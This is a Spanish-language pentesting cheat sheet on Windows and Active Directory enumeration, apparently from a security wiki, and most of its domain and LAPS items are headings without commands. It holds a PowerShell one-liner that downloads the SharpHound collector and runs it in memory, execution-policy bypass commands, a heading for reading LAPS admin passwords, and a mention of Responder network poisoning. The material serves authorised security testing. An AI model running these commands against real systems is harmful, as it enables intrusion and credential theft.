Enumeracion

1. Enumeración de la máquina local

Sysinternals de Windows

Sysinternals Suite - Windows Sysinternals | Microsoft Docsarrow-up-right

$ Get-ComputerInfo
  • Descargar en memoria scripts

$ iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1'))
  • comprobar si un equipo no tiene parches de seguridad instalados

$ HOSTNAME.EXE
$ Get-WmiObject -Class win32_OperatingSystem | select version,buildnumber
$ wmic qfe list full | findstr /i hotfix

En la web https://patchchecker.com/arrow-up-right podemos encontrar, según la versión de build de Windows, qué vulnerabilidades le afectarían debido a falta de actualizaciones, y puede ser usado para escalar privilegios.

2. Enumeración del dominio

Evadir las políticas de ejecución de Powershell

powershell.exe -executionpolicy bypass
powershell.exe -ep bypass
Set-ExecutionPolicy Unrestricted

  • Listar los usuarios del dominio

  • Listar los equipos del dominio

  • Listar los dominios del forest

  • Listar los tipos de "confianza" (trust) de los dominios/forest

  • La información de un grupo del dominio

  • Listar los miembros de un grupo del dominio

  • Listar shares del dominio, ignorando los default shares y check access

  • Listar política de contraseñas

  • Usuarios con el SID History (powerview)

  • Listar shares del dominio que el usuario actual tiene acceso

  • Comprobar configuracion de bitlocker

LAPS

  • Si LAPS se encuentra instalado en el equipo

  • Identificar si se encuentra instalado en el DC

  • Listar el atributo ms-mcs-admpwd

  • Lista el usuario o grupos que tienen permisos de lectura a la propiedad de LAPS para un equipo específico

  • Listar la ACL para todas las OU donde algún usuario tenga permisos de lectura sobre el atributo LAPS

Network poissoning

Una vez estamos conectados a la red de la infraestructura, con Responder arrow-up-rightpodemos suplantar los servicios de LLMNR y NBT-NS, ya que se transmiten vía UDP

Bloodhound

Es la herramienta por excelencia para la enumeración de un dominio.

Para ello, se ha creado una secciónarrow-up-right explícita de la herramienta.

Last updated